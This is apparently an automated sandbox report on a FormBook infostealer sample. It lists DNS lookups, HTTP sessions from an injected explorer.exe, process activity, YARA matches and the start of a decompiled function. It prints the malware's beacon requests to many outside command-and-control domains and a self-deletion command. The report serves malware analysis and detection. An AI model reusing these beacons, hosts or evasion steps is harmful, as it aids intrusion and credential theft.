Apr 12, 2021 10:06:39.590591908 CEST | 8.8.8.8 | 192.168.2.3 | 0xd579 | No error (0) | www.hispekdiamond.com |  | 213.171.195.105 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:45.027236938 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf00 | No error (0) | www.swashbug.com |  | 169.1.24.244 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:50.675977945 CEST | 8.8.8.8 | 192.168.2.3 | 0x2d44 | No error (0) | www.zagorafinancial.com | zagorafinancial.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:50.675977945 CEST | 8.8.8.8 | 192.168.2.3 | 0x2d44 | No error (0) | zagorafinancial.com |  | 162.209.114.201 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | www.funnyfootballmugs.com | funny-football-mugs.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | funny-football-mugs.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:01.374114037 CEST | 8.8.8.8 | 192.168.2.3 | 0xffff | Name error (3) | www.cdefenders.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:06.476445913 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c4 | No error (0) | www.przyczepy.net |  | 185.253.212.22 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:11.728017092 CEST | 8.8.8.8 | 192.168.2.3 | 0x4de7 | No error (0) | www.borderlesstrade.info | www.borderlesstrade.info.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:17.966291904 CEST | 8.8.8.8 | 192.168.2.3 | 0x7657 | No error (0) | www.3992199.com | k9cdna.51w4.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:17.966291904 CEST | 8.8.8.8 | 192.168.2.3 | 0x7657 | No error (0) | k9cdna.51w4.com |  | 45.142.156.44 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:23.506768942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1eb0 | No error (0) | www.montcoimmigrationlawyer.com | montcoimmigrationlawyer.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:23.506768942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1eb0 | No error (0) | montcoimmigrationlawyer.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:29.043720007 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa46 | No error (0) | www.missjeschickt.com | missjeschickt.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:29.043720007 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa46 | No error (0) | missjeschickt.com |  | 81.169.145.72 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:34.549664021 CEST | 8.8.8.8 | 192.168.2.3 | 0x436e | No error (0) | www.plaisterpress.com |  | 104.21.24.135 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:34.549664021 CEST | 8.8.8.8 | 192.168.2.3 | 0x436e | No error (0) | www.plaisterpress.com |  | 172.67.218.244 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.fibermover.com
• www.mojilifenoosa.com
• www.7chd.com
• www.hispekdiamond.com
• www.swashbug.com
• www.zagorafinancial.com
• www.funnyfootballmugs.com
• www.przyczepy.net
• www.3992199.com
• www.montcoimmigrationlawyer.com
• www.missjeschickt.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49709 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:12.742605925 CEST | 1025 | OUT | GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.fibermover.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:12.886359930 CEST | 1026 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 08:06:12 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6070a8c0-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49711 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:18.181508064 CEST | 1029 | OUT | GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.mojilifenoosa.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:18.420839071 CEST | 1029 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Mon, 12 Apr 2021 08:06:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: http://www.mojiproducts.com/register?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49734 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:07:29.401462078 CEST | 5087 | OUT | GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.missjeschickt.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:07:29.445220947 CEST | 5088 | IN | HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:07:29 GMT
Server: Apache/2.4.46 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49736 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:07:39.705074072 CEST | 5090 | OUT | GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.fibermover.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:07:39.845865965 CEST | 5091 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 08:07:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6070a8c0-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49713 | 52.15.160.167 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:24.103583097 CEST | 1034 | OUT | GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.7chd.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:24.241137028 CEST | 1035 | IN | HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:06:24 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49718 | 213.171.195.105 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:39.648039103 CEST | 4176 | OUT | GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.hispekdiamond.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:39.703871965 CEST | 4176 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 12 Apr 2021 08:06:39 GMT
Content-Type: text/html
Content-Length: 1358
Last-Modified: Wed, 02 Sep 2015 11:05:06 GMT
Connection: close
ETag: "55e6d7e2-54e"
Accept-Ranges: bytes
Apr 12, 2021 10:06:39.703888893 CEST | 4177 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padd
Apr 12, 2021 10:06:39.703958988 CEST | 4177 | IN | Data Ascii: </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49721 | 169.1.24.244 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:45.261780977 CEST | 4999 | OUT | GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.swashbug.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:45.496073008 CEST | 5000 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Apr 2021 08:06:45 GMT
Content-Type: text/html
Content-Length: 389
Last-Modified: Tue, 28 Apr 2020 08:37:12 GMT
Connection: close
Vary: Accept-Encoding
ETag: "5ea7eb38-185"
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Server-Powered-By: AfrRouter
Accept-Ranges: bytes
Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title>Domain Registered</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" /> </head> <body> <script type="text/javascript" src="https://cdn.afrihost.com/resources/domain_pages/coming_soon.js"></script> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49723 | 162.209.114.201 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:06:50.801923037 CEST | 5012 | OUT | GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.zagorafinancial.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:06:50.927325964 CEST | 5013 | IN | HTTP/1.1 301 Moved Permanently
Server: Apache/2.4.38 (Debian)
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 12 Apr 2021 08:06:50 GMT
Location: http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp
Keep-Alive: timeout=5, max=100
Connection: close
Set-Cookie: X-Mapping-fjhppofk=F4200E476AB699C7006F4ED450BE5EF4; path=/
Content-Length: 431
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&amp;pPB=K2MxltkHBDK4hDMp">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at www.zagorafinancial.com Port 80</address></body></html>


                                                                            Session ID: 6, Source IP: 192.168.2.3, Source Port: 49725, Destination IP: 23.227.38.74, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                            Timestamp: Apr 12, 2021 10:06:56.074539900 CEST, kBytes transferred: 5027, Direction: OUT, Data: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.funnyfootballmugs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Timestamp: Apr 12, 2021 10:06:56.251104116 CEST, kBytes transferred: 5029, Direction: IN, Data: HTTP/1.1 403 Forbidden
                                                                            Date: Mon, 12 Apr 2021 08:06:56 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Sorting-Hat-PodId: -1
                                                                            X-Dc: gcp-us-central1
                                                                            X-Request-ID: ee683330-34a4-49fd-a8a8-061e94606168
                                                                            Set-Cookie: _shopify_fs=2021-04-12T08%3A06%3A56Z; Expires=Tue, 12-Apr-22 08:06:56 GMT; Domain=funnyfootballmugs.com; Path=/; SameSite=Lax
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Download-Options: noopen
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                            CF-Cache-Status: DYNAMIC
                                                                            cf-request-id: 0966b7a16d00004ed36109e000000001
                                                                            Server: cloudflare
                                                                            CF-RAY: 63eaf548a8ab4ed3-FRA
                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;m
                                                                            Timestamp: Apr 12, 2021 10:06:56.251144886 CEST, kBytes transferred: 5030, Direction: IN, Data Raw: 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b
                                                                            Data Ascii: argin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9
                                                                            Timestamp: Apr 12, 2021 10:06:56.251162052 CEST, kBytes transferred: 5032, Direction: IN, Data Raw: e0 b8 b5 e0 b9 89 22 0a 20 20 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3
                                                                            Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Você não tem permissão para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta página
                                                                            Timestamp: Apr 12, 2021 10:06:56.251178026 CEST, kBytes transferred: 5033, Direction: IN, Data Raw: 64 65 6e 69 65 64 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a
                                                                            Data Ascii: denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                            Timestamp: Apr 12, 2021 10:06:56.251194000 CEST, kBytes transferred: 5033, Direction: IN, Data Raw: 67 75 61 67 65 20 7c 7c 20 2f 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74
                                                                            Data Ascii: guage || // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=
                                                                            Timestamp: Apr 12, 2021 10:06:56.251204967 CEST, kBytes transferred: 5034, Direction: IN, Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 7, Source IP: 192.168.2.3, Source Port: 49726, Destination IP: 185.253.212.22, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                            Timestamp: Apr 12, 2021 10:07:06.537733078 CEST, kBytes transferred: 5035, Direction: OUT, Data: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.przyczepy.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Timestamp: Apr 12, 2021 10:07:06.602643967 CEST, kBytes transferred: 5035, Direction: IN, Data: HTTP/1.1 403 Forbidden
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 08:07:06 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID: 8, Source IP: 192.168.2.3, Source Port: 49732, Destination IP: 45.142.156.44, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                            Timestamp: Apr 12, 2021 10:07:18.188160896 CEST, kBytes transferred: 5085, Direction: OUT, Data: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.3992199.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Timestamp: Apr 12, 2021 10:07:18.403820038 CEST, kBytes transferred: 5085, Direction: IN, Data: HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 07:55:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID: 9, Source IP: 192.168.2.3, Source Port: 49733, Destination IP: 184.168.131.241, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                            Timestamp: Apr 12, 2021 10:07:23.705914021 CEST, kBytes transferred: 5086, Direction: OUT, Data: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.montcoimmigrationlawyer.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Timestamp: Apr 12, 2021 10:07:23.957165956 CEST, kBytes transferred: 5087, Direction: IN, Data: HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:07:23 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: https://shglawpa.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Memory Usage

                                                                            High Level Behavior Distribution

                                                                            Behavior

                                                                            System Behavior

                                                                            General

                                                                            Start time:10:05:27
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:10:05:28
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:10:05:32
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:43
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                            Imagebase:0x300000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0xd70000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                              Executed Functions

                                                                              C-Code - Quality: 86%
                                                                              			_entry_() {
                                                                              				struct _SHFILEINFOA _v356;
                                                                              				long _v372;
